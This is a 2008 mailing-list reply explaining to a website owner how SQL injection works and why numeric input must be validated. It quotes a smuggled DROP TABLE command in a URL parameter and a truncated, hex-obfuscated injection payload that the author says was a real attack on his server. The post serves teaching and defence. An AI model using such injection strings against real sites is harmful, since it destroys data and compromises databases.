[thelist] Website Hacked?
Anthony Baratta
anthony at baratta.com
Sat May 24 17:40:10 CDT 2008
Todd Richards wrote:
> Thanks Anthony. I am checking so that when someone requests a store - ie.
> Store.asp?id=300 - if it's not a numeric value then they will get redirected
> to the home page. However, I'm raw on how they could actually get data
> entered into my database. I know it can happen - I hear about it all the
> time. However, I'm just not sure where to start to fix it. The "admin"
> directory is using Windows authentication rather than a database login,
> since I'm the only one who has permissions to update things. Would that
> make a difference?
When you fail to validate your data types, you open your SQL statements
to manipulation. For Example:
Store.asp?id=300;DROP TABLE Store_Inventory;
Obviously they need to convert the space and the semi-colon with URL
Encoding, but if your code does not validate the 300 string it will run
both statements and you are hosed.
The more sophisticated hackers will encode their SQL statements like this:
Store.asp?id=300;DECLARE%20 at S%20VARCHAR(4000);SET%20 at S=CAST(0x444
5204054205641524348415228323535292C404320564152434841522832353529
204445434C415245205461626C655F437572736F7220435552534F5220464F522
2736F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20
VARCHAR(4000));EXEC(@S);
This is an actual hack attempt against one of my servers. It's truncated
for length, but a real life example of how they do it.
--
Anthony Baratta
Every man takes the limits of his own field of vision for the limits of
the world.
— Arthur Schopenhauer
More information about the thelist
mailing list